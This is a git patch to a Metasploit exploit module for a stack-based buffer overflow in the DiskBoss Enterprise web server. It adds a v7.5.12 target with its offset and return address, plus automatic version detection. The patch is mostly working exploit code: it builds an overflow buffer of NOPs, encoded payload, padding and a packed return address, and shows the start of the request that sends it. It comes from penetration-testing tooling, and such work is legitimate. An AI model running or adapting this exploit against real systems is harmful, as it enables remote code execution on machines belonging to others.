From 9162374ae38339b5c696328e77ad93999c65b1be Mon Sep 17 00:00:00 2001 From: Gabor Seljan Date: Sun, 8 Jan 2017 11:23:18 +0100 Subject: [PATCH] Add automatic targeting --- .../exploits/windows/http/diskboss_get_bof.rb | 54 ++++++++++++++++--- 1 file changed, 46 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/http/diskboss_get_bof.rb b/modules/exploits/windows/http/diskboss_get_bof.rb index 713f94da66..62036dec1b 100644 --- a/modules/exploits/windows/http/diskboss_get_bof.rb +++ b/modules/exploits/windows/http/diskboss_get_bof.rb @@ -16,10 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'DiskBoss Enterprise GET Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability - in the web interface of DiskBoss Enterprise v7.4.28, caused by - improper bounds checking of the request path in HTTP GET requests - sent to the built-in web server. This module has been tested - successfully on Windows XP SP3 and Windows 7 SP1. + in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28, + caused by improper bounds checking of the request path in HTTP GET + requests sent to the built-in web server. This module has been + tested successfully on Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => @@ -43,10 +43,21 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ + ['Automatic Targeting', + { + 'auto' => true + } + ], [ 'DiskBoss Enterprise v7.4.28', { 'Offset' => 2471, - 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [Lgi.dll] + 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll] + } + ], + [ 'DiskBoss Enterprise v7.5.12', + { + 'Offset' => 2471, + 'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll] } ] ], @@ -63,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote }) if res && res.code == 200 - if res.body =~ /DiskBoss Enterprise v7\.4\.28/ + if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /DiskBoss Enterprise/ return Exploit::CheckCode::Detected @@ -77,10 +88,37 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + mytarget = target + + if (target['auto']) + mytarget = nil + + print_status("Automatically detecting the target...") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/' + }) + + if res && res.code == 200 + if res.body =~ /DiskBoss Enterprise v7\.4\.28/ + mytarget = targets[1] + elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/ + mytarget = targets[2] + end + end + + if (not mytarget) + fail_with(Failure::NoTarget, "No matching target") + end + + print_status("Selected Target: #{mytarget.name}") + end + sploit = make_nops(21) sploit << payload.encoded - sploit << rand_text_alpha(target['Offset'] - payload.encoded.length) - sploit << [target.ret].pack('V') + sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) + sploit << [mytarget.ret].pack('V') sploit << rand_text_alpha(2500) res = send_request_cgi({